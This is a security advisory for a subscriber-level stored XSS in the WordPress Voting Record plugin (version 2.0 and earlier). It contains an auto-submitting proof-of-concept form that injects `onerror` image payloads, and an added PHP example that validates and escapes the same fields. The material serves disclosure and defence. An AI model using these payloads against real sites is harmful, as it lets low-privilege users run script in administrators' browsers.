wpexploit
Daniel Ruf
WPEX-ID:5E51E239-919B-4E74-A7EE-195F3817F907
History: Jan 10, 2024 - 12:00 a.m.

Voting Record <= 2.0 - Subscriber+ Stored XSS

Tags: stored xss, voting record, subscriber, html, admin privilege

AI Score: 5.7 Medium (Confidence: High)

EPSS: 0.0004 Low (Percentile: 14.1%)

Description

The plugin is missing sanitisation as well as escaping, which could allow any authenticated user, such as a subscriber, to perform Stored XSS attacks.

Have a subscriber open an HTML file containing the following:

```
<form action="http://localhost:8888/wordpress/wp-admin/index.php" method="POST">
    <input type="text" name="bill" value="1">
    <input type="text" name="description" value='subscriber"><img src=x onerror=alert(19)>'>
    <input type="text" name="vote" value="Yea">
    <input type="text" name="voter" value='subscriber"><img src=x onerror=alert(20)>'>
    <input type="text" name="date" value="2022-12-10">
    <input type="text" name="result" value="pass">
    <input type="text" name="tally" value="3">
    <input type="text" name="record_vote" value="Save">
</form>
<script>
    document.forms[0].submit();
</script>
```

See the XSS when logged in as an admin and viewing recorded votes.
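
The missing sanitisation and escaping described above, shown as an added example that is not the plugin's code and not part of the original advisory: stand-alone PHP that validates the fields from the proof-of-concept form on input and escapes them on output. The function names, the allowed vote/result values and the table markup are assumptions.

```php
<?php
// Added example in plain PHP: a hypothetical handler, not the plugin's own code.
// Field names come from the proof-of-concept form; the allowed values are assumptions.
const ALLOWED_VOTES   = ['Yea', 'Nay'];    // assumed
const ALLOWED_RESULTS = ['pass', 'fail'];  // assumed

// Input side: validate typed fields, strip markup from free text.
// In WordPress the free-text step would be sanitize_text_field( wp_unslash( ... ) ).
function clean_vote_record(array $post): ?array
{
    $text = fn($k) => is_string($post[$k] ?? null) ? trim(strip_tags($post[$k])) : false;
    $date = is_string($post['date'] ?? null) ? $post['date'] : '';
    $d    = DateTime::createFromFormat('Y-m-d', $date);

    $clean = [
        'bill'        => filter_var($post['bill'] ?? null, FILTER_VALIDATE_INT),
        'tally'       => filter_var($post['tally'] ?? null, FILTER_VALIDATE_INT),
        'vote'        => in_array($post['vote'] ?? null, ALLOWED_VOTES, true) ? $post['vote'] : false,
        'result'      => in_array($post['result'] ?? null, ALLOWED_RESULTS, true) ? $post['result'] : false,
        'date'        => ($d && $d->format('Y-m-d') === $date) ? $date : false,
        'description' => $text('description'),
        'voter'       => $text('voter'),
    ];
    // Reject the whole record if any field failed validation.
    return in_array(false, $clean, true) ? null : $clean;
}

// Output side: escape every value for HTML at the point it is printed.
// WordPress equivalents: esc_html() for element text, esc_attr() for attributes.
function render_vote_row(array $r): string
{
    $e = fn($v) => htmlspecialchars((string) $v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return sprintf(
        '<tr title="%s"><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>',
        $e($r['description']), $e($r['bill']), $e($r['voter']), $e($r['vote']), $e($r['date'])
    );
}

// Constructed input: the values submitted by the proof-of-concept form.
$post = [
    'bill' => '1', 'vote' => 'Yea', 'date' => '2022-12-10', 'result' => 'pass', 'tally' => '3',
    'description' => 'subscriber"><img src=x onerror=alert(19)>',
    'voter'       => 'subscriber"><img src=x onerror=alert(20)>',
];
$record = clean_vote_record($post);
echo $record === null ? "rejected\n" : render_vote_row($record) . "\n";
```

Stripping tags on input still leaves the stray `">` from the payload in the stored value, so the escaping at output is what keeps it from breaking out of an attribute or element when an admin views the recorded votes.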
